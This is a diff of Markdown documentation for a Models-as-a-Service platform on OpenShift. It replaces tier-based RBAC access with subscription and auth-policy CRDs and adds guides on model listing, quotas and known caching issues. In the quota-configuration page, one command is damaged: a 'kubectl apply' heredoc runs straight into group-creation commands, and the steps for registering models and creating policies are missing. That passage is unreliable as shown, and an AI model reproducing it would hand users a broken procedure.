-## Model Tier Access Changes During Active Usage +## Model Access Changes During Active Usage ### Overview -When a model is removed from a tier's access list (by updating the `alpha.maas.opendatahub.io/tiers` annotation on an `LLMInferenceService` resource), access revocation takes effect immediately. This section describes the expected behaviors and considerations for administrators. +When a model is removed from a subscription's access list (by updating MaaSAuthPolicy or MaaSSubscription), access revocation takes effect according to how the gateway enforces policies. This section describes the expected behaviors and considerations for administrators. ### How Model Access Removal Works -1. **Annotation Update**: The administrator updates the `alpha.maas.opendatahub.io/tiers` annotation to remove a tier from the allowed list -2. **ODH Controller Processing**: The ODH Controller detects the annotation change and updates RBAC resources -3. **RBAC Update**: The RoleBinding for the removed tier is deleted, revoking POST permissions for that tier's service accounts -4. **Access Revocation**: Users from the removed tier lose access to the model +1. **Policy Update**: The administrator updates MaaSAuthPolicy or MaaSSubscription to remove access to a model +2. **Controller Processing**: The maas-controller reconciles the change and updates AuthPolicy/TokenRateLimitPolicy resources +3. **Gateway Enforcement**: The gateway (via Authorino) enforces the updated policies +4. **Access Revocation**: Users lose access to the model per the new policy ### Expected Behaviors #### 1. Impact on Active Requests -Access revocation prevents new requests immediately. +Access revocation prevents new requests once the gateway has the updated policy. -**Description**: +- **New Requests**: Any request arriving after policy propagation will be denied. +- **In-Flight Requests**: Requests that have already passed the authorization gate typically complete successfully. 
-- **New Requests**: Any request arriving after the RBAC update will be denied immediately. -- **In-Flight Requests**: Requests that have already passed the authorization gate typically complete successfully. However, dependent requests or long-running sessions requiring re-authorization will fail. +#### 2. Policy Propagation Delay -**Example Scenario**: - -```text -1. User starts a long-running inference request (e.g., 2-minute generation) -2. Administrator removes the tier from model annotation at 30 seconds -3. ODH Controller updates RBAC at 45 seconds -4. Request may fail at next authorization checkpoint (if any) -``` - -**Workaround**: - -- Avoid removing tier access during peak usage periods -- Monitor active requests before making changes -- Consider using maintenance windows for tier access changes - -#### 2. RBAC Propagation Delay - -**Description**: - -- There is a delay between annotation update and RBAC resource update by the ODH Controller -- During this window (typically seconds to minutes), access behavior is inconsistent: - - Some requests may still succeed (if authorization was cached) - - New requests may fail immediately - - Model may still appear in user's model list but be inaccessible - -**Example Timeline**: - -```text -T+0s: Annotation updated (remove "premium" tier) -T+5s: ODH Controller detects change -T+10s: RoleBinding deleted -T+15s: RBAC fully propagated to API server -``` - -**Workaround**: - -- Wait 1-2 minutes after annotation update before verifying access changes -- Monitor ODH Controller logs to confirm RBAC updates are complete -- Use `kubectl get rolebinding -n ` to verify RoleBinding removal +There may be a delay between policy update and gateway enforcement. During this window, access behavior can be inconsistent. Wait 1–2 minutes after policy updates before verifying changes. #### 3. Model List Visibility vs. 
Access -**Description**: - -- The **GET /v1/models** endpoint lists models from MaaSModelRef CRs and **filters by access**: it probes each model’s `/v1/models` endpoint with the client’s **Authorization** header (passed through as-is). Only models that return 2xx or 405 are included. -- So after tier removal, a model that the client can no longer access should **not** appear in their list (the probe will get 401/403 and the model is excluded). -- If there is a short delay between the tier change and the gateway enforcing it, a client might still see a model briefly until their next list call, or see it disappear on the next call. - -**Note**: See [Model listing flow](model-listing-flow.md) for the full flow. Token exchange is not performed; the same Authorization header the client sends is used for the probe. - -#### 4. Token Validity vs. Model Access (Expected Behavior) - -Tokens are per-user (Service Account), not per-model. Token validity and model access are independent—this is by design. - -**Description**: - -- Service Account tokens issued before tier removal remain valid until expiration -- Model access is controlled by RBAC, which is updated independently of token validity -- When a model is removed from a tier, the RBAC change revokes access immediately -- Users do not need to request new tokens; their existing tokens simply have access to fewer models - -**Example**: +The **GET /v1/models** endpoint lists models from MaaSModelRef CRs and **filters by access**: it probes each model's endpoint with the client's **Authorization** header. Only models that return 2xx or 405 are included. After access removal, a model the client can no longer access should not appear in their list. -```text -1. User receives token at T+0 (valid for 1 hour) -2. User has access to models A, B, C (via RBAC) -3. Model B removed from tier at T+30min (RBAC updated) -4. 
Token still valid, but model access changes: - - Model A: ✅ Accessible (RBAC allows) - - Model B: ❌ No longer accessible (RBAC denies) - - Model C: ✅ Accessible (RBAC allows) -``` +#### 4. Token Validity vs. Model Access -**User Communication**: - -- Clearly message users when a model is being removed from a tier to set expectations regarding token validity vs. model access. - -#### 5. Immediate Access Revocation - -**Description**: - -- The platform does not provide a "drain" mechanism to allow existing users to finish their sessions while blocking new ones. -- Revocation applies to the authorization policy immediately. -- While in-flight requests often complete (as they have passed the gate), the user experience is an immediate loss of access for any subsequent interaction. - -**Workaround**: - -- Monitor active requests before making changes: - - ```bash - # Check for active connections (example) - kubectl top pods -n - ``` - -- Use maintenance windows for tier access changes -- Consider implementing request draining in future releases +API keys and tokens are per-identity, not per-model. Token validity and model access are independent. When access to a model is revoked, existing tokens simply have access to fewer models; users do not need to request new tokens. ### Recommended Practices -1. **Plan Tier Access Changes**: - - Schedule changes during low-usage periods - - Notify affected users in advance when possible - - Monitor active requests before making changes - -2. **Verify Changes**: - - - Wait 1-2 minutes after annotation update - - Verify RoleBinding removal: - - ```bash - kubectl get rolebinding -n | grep - ``` - - - Test access with a token from the affected tier - -3. **Monitor for Issues**: - - Check ODH Controller logs for RBAC update errors - - Monitor API server logs for authorization failures - - Watch for increased error rates in user applications - -4. 
**Handle Errors Gracefully**: - - Implement retry logic with exponential backoff - - Provide clear error messages to end users - - Log access denials for troubleshooting - -### Future Enhancements - -The following improvements are planned for future releases: - -1. **Graceful Shutdown**: Implement request draining before access revocation -2. **Real-time Notifications**: Notify users when tier access changes -3. **Audit Logging**: Enhanced logging for tier access changes +1. **Plan Access Changes**: Schedule changes during low-usage periods and notify affected users when possible. +2. **Verify Changes**: Wait 1–2 minutes after policy updates, then test access. +3. **Monitor for Issues**: Check maas-controller and gateway logs for policy update errors. ### Related Documentation -- [Tier Configuration](./tier-configuration.md) - How to configure tier access -- [Model Setup](./model-setup.md) - How to configure model tier annotations -- [Token Management](./token-management.md) - Understanding token lifecycle +- [Quota and Access Configuration](quota-and-access-configuration.md) - How to configure subscription and access +- [Model Setup (On Cluster)](model-setup.md) - How to configure models for MaaS +- [Token Management](token-management.md) - Understanding token lifecycle diff --git a/docs/content/configuration-and-management/model-listing-flow.md b/docs/content/configuration-and-management/model-listing-flow.md index aadff2c52..18485067a 100644 --- a/docs/content/configuration-and-management/model-listing-flow.md +++ b/docs/content/configuration-and-management/model-listing-flow.md @@ -2,7 +2,7 @@ This document describes how the **GET /v1/models** endpoint discovers and returns the list of available models. -The list is **based on MaaSModelRef** custom resources: the API returns models that are registered as MaaSModelRefs in its configured namespace. 
+The list is **based on MaaSModelRef** custom resources: the API considers MaaSModelRef objects cluster-wide (all namespaces), then filters by access. ## Overview @@ -17,15 +17,17 @@ Each entry includes an `id`, **`url`** (the model’s endpoint), a `ready` flag, ## MaaSModelRef flow -When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed and the API is configured with a MaaSModelRef lister and namespace, the flow is: +When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed and the API is configured with a MaaSModelRef lister, the flow is: -1. The MaaS API lists all **MaaSModelRef** custom resources in its configured namespace (e.g. `opendatahub`). It reads them from an **in-memory cache** in the maas-api component (maintained by a Kubernetes informer), so it does not call the Kubernetes API on every request. +1. The MaaS API discovers **MaaSModelRef** custom resources **cluster-wide** (all namespaces) without calling the Kubernetes API on every request. 2. For each MaaSModelRef, it reads **id** (`metadata.name`), **url** (`status.endpoint`), **ready** (`status.phase == "Ready"`), and related metadata. The controller has populated `status.endpoint` and `status.phase` from the underlying LLMInferenceService (for llmisvc) or HTTPRoute/Gateway. 3. **Access validation**: The API probes each model’s `/v1/models` endpoint with the **exact Authorization header** the client sent (passed through as-is). Only models that return **2xx**, **3xx** or **405** are included in the response. This ensures the list only shows models the client is authorized to use. -4. The filtered list is returned to the client. +4. For each model, the API reads **annotations** from the MaaSModelRef to populate `modelDetails` in the response (display name, description, use case, context window). See [CRD annotations](crd-annotations.md) for the full list. + +5. 
The filtered list is returned to the client. ```mermaid sequenceDiagram @@ -53,9 +55,110 @@ sequenceDiagram - **Consistent with gateway**: The same model names and routes are used for inference; the list matches what the gateway will accept for that client. -If the API is not configured with a MaaSModelRef lister and namespace, or if listing fails (e.g. CRD not installed, no RBAC, or server error), the API returns an empty list or an error. +If the API is not configured with a MaaSModelRef lister, or if listing fails (e.g. CRD not installed, no RBAC, or server error), the API returns an empty list or an error. + +## Subscription Filtering and Aggregation + +The `/v1/models` endpoint automatically filters models based on your authentication method and optional headers. + +### Authentication-Based Behavior + +#### API Key Authentication (Bearer sk-oai-*) +When using an API key, the subscription is automatically determined from the key: +- Returns **only** models from the subscription bound to the API key at mint time + +```bash +# API key bound to "premium-subscription" +curl -H "Authorization: Bearer sk-oai-abc123..." 
\ + https://maas.example.com/maas-api/v1/models + +# Returns models from "premium-subscription" only +``` + +#### User Token Authentication (OpenShift/OIDC tokens) +When using a user token, you have flexible options: + +**Default (no X-MaaS-Subscription header)**: +- Returns **all** models from all subscriptions you have access to +- Models are deduplicated and subscription metadata is attached + +```bash +# User with access to "basic" and "premium" subscriptions +curl -H "Authorization: Bearer $(oc whoami -t)" \ + https://maas.example.com/maas-api/v1/models + +# Returns models from both subscriptions with subscription metadata +``` + +**With X-MaaS-Subscription header** (optional): +- Returns only models from the specified subscription +- Behaves like an API key request - allows you to scope your query to a specific subscription + +```bash +# Filter to only "premium" subscription models +curl -H "Authorization: Bearer $(oc whoami -t)" \ + -H "X-MaaS-Subscription: premium-subscription" \ + https://maas.example.com/maas-api/v1/models + +# Returns only "premium-subscription" models +``` + +!!! tip "User token filtering" + The `X-MaaS-Subscription` header allows user token requests to filter results to a specific subscription. This is useful when you have access to many subscriptions but only want to see models from one. 
+ +### Subscription Metadata + +All models in the response include a `subscriptions` array with metadata for each subscription providing access to that model: + +```json +{ + "object": "list", + "data": [ + { + "id": "llama-2-7b-chat", + "created": 1672531200, + "object": "model", + "owned_by": "model-namespace", + "url": "https://maas.example.com/llm/llama-2-7b-chat", + "ready": true, + "subscriptions": [ + { + "name": "basic-subscription", + "displayName": "Basic Tier", + "description": "Basic subscription with standard rate limits" + }, + { + "name": "premium-subscription", + "displayName": "Premium Tier", + "description": "Premium subscription with higher rate limits" + } + ] + } + ] +} +``` + +### Deduplication Behavior + +Models are deduplicated by `(id, url, ownedBy)` key: + +- **Same id + same URL + same MaaSModelRef (ownedBy)**: Single entry with subscriptions aggregated into the `subscriptions` array +- **Different id, URL, or MaaSModelRef**: Separate entries + +**User token authentication** (multiple subscriptions): +- Model `gpt-3.5` from MaaSModelRef `namespace-a/model-a` at URL `https://example.com/gpt-3.5` is accessible via subscriptions A and B + - Result: One entry with `subscriptions: [{name: "A"}, {name: "B"}]` +- Model `gpt-3.5` from MaaSModelRef `namespace-b/model-b` at the same URL is only in subscription B + - Result: Separate entry with `subscriptions: [{name: "B"}]` (different MaaSModelRef) +- Model `gpt-3.5` at URL `https://example.com/gpt-3.5-premium` from `namespace-a/model-a` is only in subscription B + - Result: Separate entry with `subscriptions: [{name: "B"}]` (different URL) + +**API key authentication** (single subscription): +- Deduplication handles edge cases where multiple MaaSModelRef resources point to the same model endpoint +- Each unique MaaSModelRef resource appears as a separate entry -For how to add new MaaSModelRef **kinds** (backend types) in the future, see [MaaSModelRef kinds (future)](maas-model-kinds.md). +!!! 
tip "Subscription metadata fields" + The `displayName` and `description` fields are read from the MaaSSubscription CRD's `spec.displayName` and `spec.description` fields. If these fields are not set in the CRD, they will be empty strings in the response. ## Registering models @@ -71,14 +174,18 @@ To have models appear via the **MaaSModelRef** flow: kind: MaaSModelRef metadata: name: my-model-name # This becomes the model "id" in GET /v1/models - namespace: opendatahub + namespace: llm # Same namespace as the LLMInferenceService + annotations: + openshift.io/display-name: "My Model" # optional: human-readable name + openshift.io/description: "A general-purpose LLM" # optional: description + opendatahub.io/genai-use-case: "chat" # optional: use case + opendatahub.io/context-window: "4096" # optional: context window spec: modelRef: kind: LLMInferenceService name: my-llm-isvc-name - namespace: llm -4. The controller reconciles the MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API (in the same namespace) will then include this model in GET /v1/models when it lists MaaSModelRef CRs. +4. The controller reconciles the MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API will then include this model in GET /v1/models when it lists MaaSModelRef CRs. You can use the [maas-system samples](https://github.com/opendatahub-io/models-as-a-service/tree/main/docs/samples/maas-system) as a template; the install script deploys LLMInferenceService + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription together so dependencies resolve correctly. 
@@ -87,5 +194,5 @@ You can use the [maas-system samples](https://github.com/opendatahub-io/models-a ## Related documentation - [MaaS Controller README](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) — install and MaaSModelRef/MaaSAuthPolicy/MaaSSubscription -- [Model setup](./model-setup.md) — configuring LLMInferenceServices (gateway reference, tier annotation) as backends for MaaSModelRef +- [Model setup](./model-setup.md) — configuring LLMInferenceServices (gateway reference) as backends for MaaSModelRef - [Architecture](../architecture.md) — overall MaaS architecture diff --git a/docs/content/configuration-and-management/model-setup.md b/docs/content/configuration-and-management/model-setup.md index 455bd24c3..1622e453c 100644 --- a/docs/content/configuration-and-management/model-setup.md +++ b/docs/content/configuration-and-management/model-setup.md @@ -1,19 +1,37 @@ -# Model Setup Guide +# Model Setup (On Cluster) Guide This guide explains how to configure models so they appear in the MaaS platform and are subject to authentication, rate limiting, and token-based consumption tracking. +!!! tip "Subscription model (recommended)" + When using the **MaaS controller**, model access and rate limits are controlled by **MaaSModelRef**, **MaaSAuthPolicy**, and **MaaSSubscription** CRDs. See [Quota and Access Configuration](quota-and-access-configuration.md) and [Model Listing Flow](model-listing-flow.md). + +## Supported model types + +MaaS is planning support for multiple model types through a **provider paradigm**: each MaaSModelRef references a model backend by `kind` (e.g., `LLMInferenceService`, `ExternalModel`). The controller uses provider-specific logic to reconcile and resolve each type. + +**LLMInferenceService** will be initially supported. The initial release focuses on using KServe for on-cluster models. 
This guide describes how the configuration of a MaaS-enabled LLMInferenceService differs from the default one. + ## How the model list is built -The **GET /v1/models** endpoint (and thus "which models are available") can be built in two ways: +When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed, you register models by creating **MaaSModelRef** CRs that reference a model backend (e.g., an LLMInferenceService). The controller reconciles each MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API lists these MaaSModelRef CRs and returns them as the model list. Access and quotas are controlled by **MaaSAuthPolicy** and **MaaSSubscription**. See [Model listing flow](model-listing-flow.md) for details. -1. **MaaSModelRef (recommended when using the MaaS controller)** - When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed, you register models by creating **MaaSModelRef** CRs that reference an LLMInferenceService. The controller reconciles each MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API lists these MaaSModelRef CRs and returns them as the model list. Access and quotas are controlled by **MaaSAuthPolicy** and **MaaSSubscription**. See [Model listing flow](model-listing-flow.md) for details. +## MaaS-capable vs standard gateways -Model listing is from MaaSModelRef CRs (cached via informer). The sections below focus on **LLMInferenceService** configuration (gateway reference, tier annotation) for use as the backend referenced by MaaSModelRef. +MaaS uses a **segregated gateway approach**. Models explicitly opt in to MaaS capabilities by routing through the **MaaS gateway** (`maas-default-gateway`). Models that use the **standard gateway** (ODH/KServe default) do not use MaaS policies. 
-## Gateway Architecture +| | Standard gateway (ODH/KServe) | MaaS gateway (`maas-default-gateway`) | +|--|-----------------------------|--------------------------------------| +| **Authentication** | Existing ODH/KServe auth model | Token-based (API keys, OpenShift tokens) | +| **Rate limits** | None | Subscription-based (Limitador) | +| **Token consumption** | Not tracked | Tracked per usage | +| **Access control** | Platform-level | Per-model (MaaSAuthPolicy, MaaSSubscription) | +| **Use case** | Standard inference without MaaS policies | MaaS-managed access, quotas, and tracking | -The MaaS platform uses a **segregated gateway approach**, where models explicitly opt-in to MaaS capabilities by referencing the `maas-default-gateway`. This provides flexibility and isolation between different model deployment scenarios. +Models that use the standard gateway do not appear in the MaaS model list and are not subject to MaaS policies. To use MaaS features, configure your model to route through the MaaS gateway. + +## Gateway architecture (diagram) + +The diagram below shows how models can route through either gateway. ```mermaid %%{init: {'theme':'base', 'themeVariables': { 'fontSize':'16px', 'fontFamily':'system-ui, -apple-system, sans-serif', 'edgeLabelBackground':'transparent', 'labelBackground':'transparent', 'tertiaryColor':'transparent'}}}%% @@ -21,7 +39,7 @@ graph TB subgraph cluster["OpenShift/K8s Cluster"] subgraph gateways["Gateway Layer"] defaultGW["Default Gateway
(ODH/KServe)

✓ Existing auth model
✓ No rate limits
"] - maasGW["MaaS Gateway
(maas-default-gateway)

✓ Token authentication
✓ Tier-based rate limits
✓ Token consumption "] + maasGW["MaaS Gateway
(maas-default-gateway)

✓ Token authentication
✓ Subscription-based rate limits
✓ Token consumption "] end subgraph models["Model Deployments"] @@ -48,30 +66,27 @@ graph TB !!! note The `maas-default-gateway` is created automatically during MaaS platform installation. You don't need to create it manually. -### Benefits +### Benefits of the segregated approach - **Flexibility**: Different models can have different security and access requirements -- **Progressive Adoption**: Teams can adopt MaaS features incrementally -- **Production Control**: Production models get full policy enforcement if needed -- **Multi-Tenancy**: Different teams can use different gateways in the same cluster -- **Blast Radius Containment**: Issues with one gateway don't affect the other +- **Progressive adoption**: Teams can adopt MaaS features incrementally +- **Production control**: Production models get full policy enforcement when routed through the MaaS gateway +- **Multi-tenancy**: Different teams can use different gateways in the same cluster +- **Blast radius containment**: Issues with one gateway don't affect the other ## Prerequisites -Before configuring a model for MaaS, ensure you have: +Before configuring an LLMInferenceService for MaaS, ensure you have: - **MaaS platform installed** with `maas-default-gateway` deployed - **LLMInferenceService** resource created or planned - **Cluster admin** or equivalent permissions to modify `LLMInferenceService` resources -## Configuring Models for MaaS - -To make your model available through the MaaS platform, you need to: +## Configuring LLMInferenceService for MaaS -1. **Reference the maas-default-gateway** in your `LLMInferenceService` spec -2. **Add the tier annotation** to enable automatic RBAC setup +To make your LLMInferenceService available through the MaaS platform, **reference the maas-default-gateway** in the `LLMInferenceService` spec. This routes traffic through the MaaS gateway so authentication, rate limiting, and consumption tracking apply. 
-### Step 1: Add Gateway Reference +### Add gateway reference Configure your `LLMInferenceService` to use the `maas-default-gateway` by adding the gateway reference in the `router` section: @@ -99,13 +114,13 @@ spec: # ... container configuration ... ``` -**Key Points:** +**Key points:** - The `router.gateway.refs` field specifies which gateway to use - Use `name: maas-default-gateway` and `namespace: openshift-ingress` -- **Without this specification**, the model uses the default KServe gateway and **is not subject to MaaS policies** +- **Without this specification**, the LLMInferenceService uses the default KServe gateway and **is not subject to MaaS policies** -### Step 2: Configure Tier Access with Annotation +### Configure tier access with annotation Add the `alpha.maas.opendatahub.io/tiers` annotation to enable automatic RBAC setup for tier-based access: @@ -144,6 +159,29 @@ annotations: alpha.maas.opendatahub.io/tiers: '["premium","enterprise"]' ``` +### Add display metadata (optional) + +Add standard annotations to your **MaaSModelRef** to provide human-readable names and descriptions in the `GET /v1/models` API response: + +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: my-production-model + namespace: llm + annotations: + openshift.io/display-name: "My Production Model" + openshift.io/description: "A fine-tuned model for production workloads" + opendatahub.io/genai-use-case: "chat" + opendatahub.io/context-window: "8192" +spec: + modelRef: + kind: LLMInferenceService + name: my-production-model +``` + +These annotations are returned in the `modelDetails` field of the API response. All are optional. See [CRD annotations](crd-annotations.md) for the full list of supported annotations across all MaaS CRDs. + ### What the Annotation Does This annotation automatically creates the necessary RBAC resources (Roles and RoleBindings) that allow tier-specific service accounts to POST to your `LLMInferenceService`. 
The ODH Controller handles this automatically when the annotation is present. @@ -155,7 +193,7 @@ Behind the scenes, it creates: ### Complete Example -Here's a complete example of a MaaS-enabled model: +Here's a complete example of an LLMInferenceService configured for MaaS: ```yaml apiVersion: serving.kserve.io/v1alpha1 @@ -163,8 +201,6 @@ kind: LLMInferenceService metadata: name: qwen3-model namespace: llm - annotations: - alpha.maas.opendatahub.io/tiers: '[]' spec: model: uri: hf://Qwen/Qwen3-0.6B @@ -189,9 +225,9 @@ spec: memory: 8Gi ``` -## Updating Existing Models +## Updating existing models -To convert an existing model to use MaaS: +To convert an existing LLMInferenceService to use MaaS: ### Method 1: Patch the Model @@ -207,10 +243,6 @@ kubectl patch llminferenceservice my-production-model -n llm --type='json' -p='[ } ]' -# Add the tier annotation -kubectl annotate llminferenceservice my-production-model -n llm \ - alpha.maas.opendatahub.io/tiers='[]' \ - --overwrite ``` ### Method 2: Edit the Resource @@ -219,14 +251,11 @@ kubectl annotate llminferenceservice my-production-model -n llm \ kubectl edit llminferenceservice my-production-model -n llm ``` -Then add: - -- Gateway reference in `spec.router.gateway.refs` -- Annotation `alpha.maas.opendatahub.io/tiers` in `metadata.annotations` +Then add the gateway reference in `spec.router.gateway.refs`. ## Verification -After configuring your model, verify it's accessible through MaaS: +After configuring your LLMInferenceService, verify it's accessible through MaaS: **1. Check the model appears in the models list:** @@ -243,13 +272,7 @@ curl -sSk ${HOST}/maas-api/v1/models \ kubectl get llminferenceservice my-production-model -n llm ``` -**3. Check RBAC was created (if using tier annotation):** - -```bash -kubectl get roles,rolebindings -n llm | grep my-production-model -``` - -**4. Test inference request:** +**3. 
Test inference request:** ```bash # Use the MODEL_URL from the models list @@ -269,23 +292,20 @@ curl -sSk -H "Authorization: Bearer $TOKEN" \ ### 401 Unauthorized When Accessing Model -- Verify the tier annotation is set: `alpha.maas.opendatahub.io/tiers: '[]'` (or specific tiers) -- Check that your token's tier matches one of the tiers allowed in the annotation -- Verify RBAC resources were created: `kubectl get roles,rolebindings -n ` +- Verify your subscription (MaaSAuthPolicy, MaaSSubscription) grants access to the model +- Check that your API key or token is valid and has the correct permissions +- Ensure the model's MaaSModelRef and AuthPolicy are correctly configured ### 403 Forbidden When Accessing Model -- Ensure the tier annotation includes your tier -- Check that RBAC was properly created for your tier -- Verify the service account in your token has the correct tier namespace - -!!!Warning "Removing Models from Tiers During Active Usage" - When updating the `alpha.maas.opendatahub.io/tiers` annotation to remove a tier, be aware that active requests may be affected. See [Model Tier Access Behavior](./model-access-behavior.md#model-tier-access-changes-during-active-usage) for details on expected behaviors and recommended practices. 
+- Ensure your subscription includes access to the model +- Verify MaaSAuthPolicy grants your group access +- Check that the maas-controller has reconciled the AuthPolicy ## References -- [Tier Management](./tier-overview.md) - Learn about configuring tier access -- [Tier Configuration](./tier-configuration.md) - Detailed tier setup instructions -- [Model Tier Access Behavior](./model-access-behavior.md) - Expected behaviors and operational considerations +- [Access and Quota Overview](subscription-overview.md) - Configure policies and subscriptions +- [Quota and Access Configuration](quota-and-access-configuration.md) - Detailed configuration +- [Model Access Behavior](model-access-behavior.md) - Expected behaviors when modifying model access - [Architecture Overview](../architecture.md) - Understand the overall MaaS architecture - [KServe LLMInferenceService Documentation](https://kserve.github.io/website/) - Official KServe documentation diff --git a/docs/content/configuration-and-management/quota-and-access-configuration.md b/docs/content/configuration-and-management/quota-and-access-configuration.md new file mode 100644 index 000000000..62c9d1826 --- /dev/null +++ b/docs/content/configuration-and-management/quota-and-access-configuration.md @@ -0,0 +1,263 @@ +# Quota and Access Configuration + +This guide provides step-by-step instructions for configuring MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription. For conceptual overview, see [Access and Quota Overview](subscription-overview.md) and [MaaS Models](maas-models.md). + +## Prerequisites + +- **MaaS platform installed** — See [Install MaaS Components](../install/maas-setup.md) +- **LLMInferenceService** for your model (or external model endpoints) +- Cluster admin or equivalent permissions to create CRs in the `models-as-a-service` and model namespaces + +!!! 
note "Deploy a sample model" + Command to deploy simulator model as `free-model`: + + ```bash + kustomize build 'https://github.com/opendatahub-io/models-as-a-service//docs/samples/maas-system/free/llm?ref=main' | \ + sed 's/facebook-opt-125m-simulated/free-model/g' | kubectl apply -f - + ``` + +## Overview: What You'll Accomplish + +Before running the configuration steps, here is the flow you will set up: + +1. **Register models** — Create a MaaSModelRef for each model so MaaS knows about it and can expose it through the API. The controller reconciles each ref and populates the endpoint. + +2. **Grant access** — Create MaaSAuthPolicy resources that define *which* groups or users can use *which* models. A user must match a policy to see and call a model. + +3. **Define subscriptions** — Create MaaSSubscription resources that define *quota* (token rate limits) for groups or users. A user must have both access (policy) and quota (subscription) to use a model. + +4. **Validate** — Confirm the CRs are reconciled, policies are enforced, and you can list models and run inference. + +## Configuration Steps + +Set the namespace and name of your LLMInferenceService (used in the commands below): + +```bash +MODEL_NS=llm +MODEL_NAME=free-model # From the Prerequisites deploy; or: kubectl get llminferenceservice -n $MODEL_NS -o jsonpath='{.items[0].metadata.name}' +``` + +### 1. Register Models (MaaSModelRef) + +Create a MaaSModelRef for each model you want to expose through MaaS. The MaaSModelRef must be in the **same namespace** as the LLMInferenceService. The `spec.modelRef.name` must match the LLMInferenceService name. 
+ +```yaml +kubectl apply -f - </dev/null || true +oc adm groups new premium-users 2>/dev/null || true + +# Add users to each group +oc adm groups add-users free-users alice@example.com +oc adm groups add-users premium-users bob@example.com +``` + +**Create API keys and verify access:** + +Create an API key as a user in `free-users` and another as a user in `premium-users`. Follow the [Validation](../install/validation.md) guide to: + +1. Get the gateway endpoint and create an API key for each user +2. List models and run inference with each API key +3. Test with both groups to confirm access and different rate limits — free-users (100 tokens/min) vs premium-users (100,000 tokens/24h) + +## Adding Groups + +To grant a user access to a subscription, add them to the appropriate Kubernetes group: + +```bash +# Create groups if they do not exist +oc adm groups new free-users 2>/dev/null || true +oc adm groups new premium-users 2>/dev/null || true + +# Add users (method depends on your IdP; OpenShift example) +oc adm groups add-users free-users alice@example.com +oc adm groups add-users premium-users bob@example.com +``` + +Users will get subscription access on their next request (after group membership propagates). + +## Multiple Subscriptions per User + +When a user belongs to multiple groups that each have a subscription, the access depends on the API key used. A subscription is bound to each API key at minting (explicit or highest priority). See [Understanding Token Management](token-management.md). + +## Troubleshooting + +### 403 Forbidden: "no access to subscription" + +**Cause:** User requested a subscription they do not belong to (group membership). + +**Fix:** Ensure the user is in a group listed in the subscription's `spec.owner.groups`. + +### 429 Too Many Requests + +**Cause:** User exceeded token rate limit for the model. + +**Fix:** Wait for the rate limit window to reset, or upgrade to a subscription with higher limits. 
+ +### Model not appearing in GET /v1/models + +**Cause:** MaaSModelRef missing, not reconciled, or access probe failed. + +**Fix:** + +- Verify MaaSModelRef exists in the model namespace (e.g. `llm`) and has `status.phase: Ready` +- Check MaaSAuthPolicy in `models-as-a-service` includes the user's groups and references the MaaSModelRef with correct `name` (e.g. `${MODEL_NAME}-ref`) and `namespace` +- Ensure MaaSSubscription in `models-as-a-service` exists for the model and user's groups + +### Policies not enforced + +**Cause:** Kuadrant controller may need to re-sync. + +**Fix:** + +```bash +kubectl delete pod -l control-plane=controller-manager -n kuadrant-system +kubectl wait --for=condition=Enforced=true tokenratelimitpolicy/<policy-name> -n llm --timeout=2m +``` + +## Related Documentation + +- [Access and Quota Overview](subscription-overview.md) — How policies and subscriptions work together +- [MaaS Models](maas-models.md) — Conceptual overview +- [Token Management](token-management.md) +- [Validation](../install/validation.md) diff --git a/docs/content/configuration-and-management/subscription-known-issues.md b/docs/content/configuration-and-management/subscription-known-issues.md new file mode 100644 index 000000000..8f55af505 --- /dev/null +++ b/docs/content/configuration-and-management/subscription-known-issues.md @@ -0,0 +1,47 @@ +# Subscription Known Issues + +This document describes known issues and operational considerations for the subscription-based MaaS Platform. + +## Subscription Selection Caching + +### Cache TTL for Subscription Selection + +**Impact:** Medium + +**Description:** + +Authorino caches the result of the MaaS API subscription selection call (e.g., 60-second TTL). 
If a user's group membership changes: + +- Within the cache window, the old subscription selection may still apply +- After cache expiry, the new group membership is used +- Restarting Authorino pods forces immediate cache invalidation (disruptive) + +**Workaround:** + +- Wait for cache TTL for changes to fully propagate +- For immediate effect, restart Authorino pods (disruptive; use during maintenance windows) + +## API Key vs OpenShift Token + +### Group Snapshot in API Keys + +**Impact:** Medium + +**Description:** + +API keys store the user's groups and bound subscription name at creation time. If a user's group membership changes after the key was created: + +- The key still carries the **old** groups and subscription until it is revoked and recreated +- Subscription metadata for gateway inference uses the stored groups and subscription from validation +- The user must create a new API key to pick up new groups or a different default subscription + +**Workaround:** + +- Revoke and recreate API keys when users change groups +- Use OpenShift tokens for interactive use when group membership changes frequently (tokens reflect live group membership) + +## Related Documentation + +- [Understanding Token Management](token-management.md) +- [Access and Quota Overview](subscription-overview.md) +- [Quota and Access Configuration](quota-and-access-configuration.md) diff --git a/docs/content/configuration-and-management/subscription-overview.md b/docs/content/configuration-and-management/subscription-overview.md new file mode 100644 index 000000000..e8cad48b4 --- /dev/null +++ b/docs/content/configuration-and-management/subscription-overview.md @@ -0,0 +1,69 @@ +# Access and Quota Overview + +When planning authorization for Models as a Service, it is important to understand how **policies** (MaaSAuthPolicy) and **subscriptions** (MaaSSubscription) work together. Both use RBAC references (subjects or owners). 
A user must have **both** a matching policy (access) and a matching subscription (quota) to use a model. + +MaaSAuthPolicy and MaaSSubscription are namespace-scoped to `models-as-a-service`; they reference MaaSModelRefs (in e.g. `llm`) by `name` and `namespace` in their `modelRefs`. + +```mermaid +flowchart TD + User([User / App]) -- "Request (API key + model)" --> Gateway{MaaS API Gateway} + + subgraph Validation ["Dual-Check Gate"] + direction LR + A["MaaSAuthPolicy
(Access: Can I use this?)"] + B["MaaSSubscription
